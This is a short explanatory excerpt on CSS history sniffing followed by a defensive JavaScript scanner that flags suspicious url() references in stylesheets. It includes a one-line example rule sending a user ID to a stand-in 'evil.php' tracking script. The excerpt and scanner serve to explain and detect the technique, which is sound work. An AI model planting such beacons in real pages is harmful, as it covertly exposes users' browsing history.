CSS Snoop (from SitePoint):
Now, instead of giving the URL of a benign image file, the attacking site can supply a URL to a server-side script, passing along a unique ID to identify you:
#examplelink { background-image: url(evil.php?user=123); }
That script can then collect and store a list of all users who, in this case, have visited http://www.example.com/.
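
A defensive counterpart to the excerpt, added here and not part of the SitePoint article or this post: a small JavaScript scanner that flags `url()` references in a stylesheet when they point at a non-static resource or carry a query string, as the `evil.php?user=123` rule does. The extension allowlist, the function names and the sample stylesheet are assumptions made for the example.

```javascript
// Extensions treated as static assets (an assumed allowlist; adjust per site).
const STATIC_EXT = new Set(['png', 'jpg', 'jpeg', 'gif', 'svg', 'webp', 'ico', 'woff', 'woff2', 'ttf']);
// Flat "selector { declarations }" matcher; nested at-rules are not handled.
const RULE_RE = /([^{}]+)\{([^{}]*)\}/g;
const URL_RE = /url\(\s*(['"]?)(.*?)\1\s*\)/gi;

function classifyUrl(raw) {
  const reasons = [];
  let parsed;
  try {
    // Placeholder base so relative references such as "evil.php?user=123" resolve.
    parsed = new URL(raw, 'http://stylesheet.invalid/');
  } catch (e) {
    return ['unparseable URL'];
  }
  if (parsed.protocol === 'data:') return reasons; // inline data, no request is sent
  const file = parsed.pathname.split('/').pop();
  const dot = file.lastIndexOf('.');
  const ext = dot >= 0 ? file.slice(dot + 1).toLowerCase() : '';
  if (!STATIC_EXT.has(ext)) reasons.push('non-static resource: ' + (ext || 'no extension'));
  if (parsed.search.length > 1) reasons.push('query string: ' + parsed.search);
  return reasons;
}

function findCssBeacons(cssText) {
  const findings = [];
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ''); // drop comments first
  for (const rule of css.matchAll(RULE_RE)) {
    const selector = rule[1].trim();
    for (const m of rule[2].matchAll(URL_RE)) {
      const reasons = classifyUrl(m[2]);
      if (reasons.length) findings.push({ selector, url: m[2], reasons });
    }
  }
  return findings;
}

// Constructed sample: the rule from the excerpt plus two benign rules.
const SAMPLE_CSS = `
/* site theme */
.logo { background-image: url("img/logo.png"); }
#examplelink { background-image:
  url(evil.php?user=123); }
.icon { background: url('data:image/gif;base64,R0lGODlhAQABAAAAACw=') no-repeat; }
`;

console.log(findCssBeacons(SAMPLE_CSS));
```

Findings are candidates for review rather than verdicts: a cache-busting query string on an ordinary image is flagged as well.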